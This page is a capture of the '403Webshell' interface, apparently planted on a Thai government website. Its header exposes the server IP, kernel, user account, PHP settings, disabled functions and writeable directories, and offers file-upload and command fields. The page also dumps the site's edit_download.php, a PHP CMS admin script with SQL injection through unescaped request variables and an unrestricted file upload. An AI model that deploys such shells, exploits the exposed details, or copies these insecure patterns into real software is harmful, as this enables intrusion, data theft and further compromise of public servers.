403Webshell
Server IP : 119.59.102.212  /  Your IP : 18.117.197.188
Web Server : Apache/2
System : Linux narin 2.6.32-042stab142.1 #1 SMP Tue Jan 28 23:44:17 MSK 2020 x86_64
User : yangkam ( 1022)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/yangkam/domains/yangkam.go.th/public_html/coremain/module/load/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/yangkam/domains/yangkam.go.th/public_html/coremain/module/load/edit_download.php
<?php

$navig['load']=$data_name_menu_sub['name'];
$navig['edit_download']="แก้ไขข้อมูล";
navigator($navig);

bar_header($_SESSION['bar_name']); // Bar_Header
fieldset_top($_SESSION['bar_name']);

import_request_variables('pG', 'p_');
if($p_id_group!="")							{  $id_group=trim($p_id_group);												}
if($p_update_download_g!="")					{  $update_download_g=trim($p_update_download_g);							}
if($p_update_download_gclick!="")			{  $update_download_gclick=trim($p_update_download_gclick);			}

if($p_id_sub1!="")								{  $id_sub1=trim($p_id_sub1);													}
if($p_update_download_s!="")					{  $update_download_s=trim($p_update_download_s);							}
if($p_update_download_sclick!="")			{  $update_download_sclick=trim($p_update_download_sclick);			}
if($p_topic!="")									{  $topic=trim($p_topic);			}
if($p_download!="")										{  $download=trim($p_download);			}
if($p_name_group!="")										{  $name_group=trim($p_name_group);			}
if($p_download_url!="")										{  $download_url=trim($p_download_url);			}
$userfile1_name=trim($_FILES['userfile1']['name']);


// ############################################## แก้ไขส่วนย่อยดาวน์โหลด
if ($id_sub1 != "" && $update_download_s == "1" && $update_download_sclick == "1") {
  //********************** ตรวจสอบว่า มีการ Upload File ที่ 1 หรือไม*******************************************่
  if ($userfile1_name != "") {     // กำหนดชื่อไฟล์ที่ upload ใหม่ ทั้งนี้เพื่อให้ ไฟล์ไม่ซ้ำกัน
    $sqlmax1 = "select max(id+1)  from cms_file";
    $resultmax1 = mysql_query($sqlmax1);
    $datamax1 = mysql_fetch_row($resultmax1);
    // ลบไฟล์เก่าออกก่อน	
    $sql1 = "select files  from cms_file  where id='$id_sub1'";
    $result1 = mysql_query($sql1);
    $data1 = mysql_fetch_row($result1);
    if ($data1[0] != "") {
      unlink("$_SESSION[web_name]/mainfile/$data1[0]");
    }
    // ชื่อไฟล์
	$str  = "123456789abcdefghijkmnpqrstuvwxyz";
	$pic1 = substr(str_shuffle($str), 0, 9);
    $strings = get_file_type($userfile1_name);
    $name1 = "fileupdate$pic1$datamax1[0]$strings";
    $dlink = "$_SESSION[web_name]/mainfile/" . $name1;
    $temp_name = $_FILES['userfile1']['tmp_name'];
    if (is_uploaded_file($_FILES['userfile1']['tmp_name'])) {
      if (!move_uploaded_file($temp_name, $dlink)) {
        
      }
    }
  } else if ($userfile1_name == "") {
    $sql1 = "select files  from cms_file  where id='$id_sub1'";
    $result1 = mysql_query($sql1);
    $data1 = mysql_fetch_row($result1);
    $name1 = $data1[0];
  }

  $sql = "UPDATE `cms_file` SET `topic` = '$topic', `files` = '$name1'  WHERE `id` = '$id_sub1'";
  $result = mysql_query($sql);
  echo"<br><br><center>ข้อมูลได้ถูกแก้ไขแล้ว<br><br></enter>";
  echo"<meta http-equiv='refresh' content='1; url=index.php?mod=load&path=load'>";
//  include('coremain/footer.php');
  exit;
}


// แสดงข้อมูล การแก้ไขหัวข้อดาวน์โหลด
if($id_group!="" && $update_download_g=="1" && $update_download_gclick==""){
  $sql = "SELECT * FROM cms_file_group  where id_group='$id_group'";
  $result = mysql_query($sql);
  $data = mysql_fetch_array($result);

  echo"<br><table width='100%' border='0' align='center' cellpadding='1' cellspacing='1' >";
  echo"  <tr  height='20'>";
  echo "<FORM METHOD=POST ACTION='index.php?mod=edit_download&path=load&id_group=$data[id_group]&update_download_g=1&update_download_gclick=1'>";
  echo"	 <td width=5%><center><img src='coremain/images/marker.gif'> <b>หัวข้อดาวน์โหลด</b> &nbsp;<INPUT TYPE='text' NAME='name_group' value='$data[name_group]' size='35'><br><br>&nbsp;&nbsp;&nbsp;<INPUT TYPE='submit' value='แก้ไขข้อมูล' onmouseover=this.style.cursor='hand'></center></td>";
  echo"</FORM>";
  echo"  </tr>";
  echo"</table>";
}

// แสดงการแก้ไขข้อมูลส่วนย่อยดาวน์โหลด
if ($id_sub1 != "" && $update_download_s == "1" && $update_download_sclick == "") {
  $sql = "SELECT * FROM cms_file  where id='$id_sub1'";
  $result = mysql_query($sql);
  $data = mysql_fetch_array($result);
  echo "<FORM METHOD=POST ACTION='index.php?mod=edit_download&path=load&id_sub1=$data[id]&update_download_s=1&update_download_sclick=1' enctype='multipart/form-data'>";
  echo"<table width='98%' border='0' align='center' cellpadding='1' cellspacing='1' >";

  echo"  <tr  height='45'>";
  echo"	 <td width=5%></td>";
  echo"	 <td width=25%><img src='coremain/images/marker.gif'> <b>ชื่อไฟล์</b></td>";
  echo"	 <td width='65%'><INPUT TYPE='text' NAME='topic' value='$data[topic]' size='35'></td>";
  echo"  </tr>";

  echo"  <tr  height='20'>";
  echo"	 <td></td>";
  echo"	 <td><img src='coremain/images/marker.gif'> <b>Upload File</b></td>";
  echo"	 <td><input name='userfile1' type=file size=35></td>";
  echo"  </tr>";

  button_text('แก้ไขข้อมูล', 'submit', 3);
//  echo"  <tr  height='45'>";
//  echo"	 <td colspan='3' align='center'> <INPUT TYPE='submit' value='แก้ไขข้อมูล' onmouseover=this.style.cursor='hand'></td>";
//  echo"  </tr>";

  echo"</table>";
  echo"</FORM>";
}
fieldset_down();
?>

Youez - 2016 - github.com/yon3zu
LinuXploit